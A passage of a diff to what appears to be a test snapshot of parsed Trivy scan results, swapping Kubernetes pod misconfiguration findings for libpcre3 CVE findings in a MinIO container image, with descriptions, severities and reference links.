{ "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], "severity": "LOW", @@ -130896,173 +132291,77 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "category": "Vulnerability", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "http://www.securityfocus.com/bid/101688", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], "severity": "LOW", @@ -131070,115 +132369,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "http://www.securityfocus.com/bid/97067", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'kube-scheduler' of Pod 'kube-scheduler-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'kube-scheduler-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, ], "severity": "LOW", @@ -131186,154 +132427,57 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-scheduler-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", ], }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-scheduler-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.securityfocus.com/bid/97067", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3134-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3161-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3366-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u11", - "foundIn": "Target: 'k8s.gcr.io/kube-controller-manager:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3412-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0033", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0033", - ], - }, - "category": "Misconfiguration", - "description": "Activate garbage collector on pod termination, as appropriate.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", - "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0033", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + }, + { + "type": "URL", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0034", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0034", - ], - }, - "category": "Misconfiguration", - "description": "Disable profiling, if not needed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", - "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0034", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], "severity": "LOW", @@ -131341,289 +132485,117 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0038", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0038", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, - "category": "Misconfiguration", - "description": "Enable kubelet server certificate rotation on controller-manager.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", - "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", + "category": "Vulnerability", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0038", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": 